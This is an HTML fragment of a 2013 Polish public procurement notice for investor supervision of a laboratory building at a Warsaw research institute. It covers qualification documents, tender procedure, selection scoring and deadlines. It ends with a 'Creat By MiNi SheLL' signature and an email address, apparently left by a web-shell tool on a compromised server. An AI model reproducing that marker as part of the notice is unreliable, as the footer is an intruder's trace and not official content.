<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. III.4.2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Jeżeli w kraju zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
Formularz (wzór) Wniosku o dopuszczenie do udziału w postępowaniu, oświadczenia o spełnianiu warunków udziału w postępowaniu, oświadczenia o braku podstaw do wykluczenia z postępowania, informacja o przynależności do grupy kapitałowej oraz formularze: Wykaz usług i Wykaz osób są dostępne na stronie internetowej Zamawiającego pod adresem:  http://www.ciop.pl - aktualności - zamówienia publiczne wszczęte
Wniosek o dopuszczenie do udziału w postępowaniu należy złożyć w budynku przy, ul. Czerniakowskiej 16, 00-701 Warszawa, pokój nr 335 - Kancelaria, lub wysłać na ten adres. 
Wniosek o dopuszczenie do udziału w postępowaniu powinien być złożony w formie pisemnej i podpisany przez osobę upoważnioną do reprezentowania Wykonawcy. 
Wykonawcy wspólnie ubiegający się o zamówienie powinni ustanowić pełnomocnika do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia oraz załączyć do wniosku o dopuszczenie do udziału w postępowaniu pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia (akceptowalna również umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo). Pełnomocnik może być ustanowiony do reprezentowania wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo powinno być złożone w oryginale.
Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem wskazanym przez Wykonawcę we wniosku o dopuszczenie do udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zamawiający zaprosi do składania ofert 5 (pięciu) Wykonawców, którzy spełniają warunki udziału w postępowaniu. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie niższa bądź równa 5 (pięć), do złożenia ofert zostaną zaproszeni wszyscy Wykonawcy spełniający warunki udziału w postępowaniu bez stosowania niżej opisanej procedury wyłaniania Wykonawców. 
W przypadku, gdy liczba Wykonawców spełniających warunki udziału w postępowaniu będzie wyższa niż 5 (pięć), wówczas do złożenia ofert zostanie zaproszonych 5 (pięciu) Wykonawców, którzy otrzymają najwyższą liczbę punktów za każde dodatkowe doświadczenie, wykazane w wykazie zrealizowanych usług. 
Do udziału w postępowaniu zaproszeni zostaną Wykonawcy, którzy wykażą się największym doświadczeniem potwierdzonym dokumentami należytego wykonania, tj.:
a)	za każdą usługę świadczenia nadzoru inwestorskiego, łącznie w co najmniej następujących branżach: konstrukcyjno-budowlanej, instalacji sanitarnej, instalacji elektrycznej, polegającej na wybudowaniu budynku laboratoryjnego lub laboratoryjno-dydaktycznego lub budynku użyteczności publicznej, zawierającym wyodrębnioną część laboratoryjną Wykonawca otrzyma 10 pkt. Liczba uzyskanych punktów z tego tytułu nie może przekroczyć łącznie 60;
b)	za każdą usługę świadczenia nadzoru inwestorskiego, łącznie w co najmniej następujących branżach: konstrukcyjno-budowlanej, instalacji sanitarnej, instalacji elektrycznej, polegającej na wybudowaniu budynku przy głębokim fundamentowaniu (spód ław fundamentowych na głębokości co najmniej - 4 mppt), wraz z kontrolą geotechniczną warunków posadowienia budynku Wykonawca otrzyma 10 pkt. Liczba uzyskanych punktów z tego tytułu nie może przekroczyć łącznie 40;
Zamawiający informuje, iż dokonując powyższej kwalifikacji z wykazu wykonanych usług uwzględni tylko te usługi, których opis pozwoli na dokonanie jednoznacznej oceny i nie będzie w tym zakresie stosował art. 26 ust. 3 ustawy Pzp. 
W przypadku, gdy nie będzie można dokonać zakwalifikowania 5 Wykonawców z uwagi na to, że dwóch lub więcej Wykonawców uzyska taką samą liczbę punktów, Zamawiający spośród nich wybierze tych Wykonawców, u których łączna wartość budynków ocenianych zgodnie z lit. a) będzie najwyższa.
Zamawiający informuje, iż w przypadku gdy Wykonawca powoła się na wiedzę i doświadczenie podmiotów, o których mowa w art. 26 ust. 2b ustawy Pzp doświadczenie tych podmiotów nie będzie brane pod uwagę w procesie kwalifikacji.
Zamawiający informuje, że na etapie składania wniosków o dopuszczenie do udziału w postępowaniu nie przewiduje udzielania wyjaśnień oraz odpowiedzi na pytania Wykonawców.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ciop.pl - aktualności - zamówienia publiczne wszczęte<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2013 godzina 10:00, miejsce: Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy ul. Czerniakowska 16, 00-701 Warszawa piętro III, pok. 335 - Kancelaria. Godziny pracy Kancelarii od 8.00 do 16.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu nr POIG.02.01.00-14-088/09, tytuł Projektu Centrum Badań i Rozwoju Technik Bezpieczeństwa Procesów Pracy i Środowiska (Tech-Safe-Bio) Centralnego Instytutu Ochrony Pracy - Państwowego Instytutu Badawczego realizowany w ramach Programu Operacyjnego Innowacyjna Gospodarka, lata 2007-2013, Priorytet 2. Infrastruktura sfery B + R, Działanie 2.1. Rozwój ośrodków o wysokim potencjale badawczym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com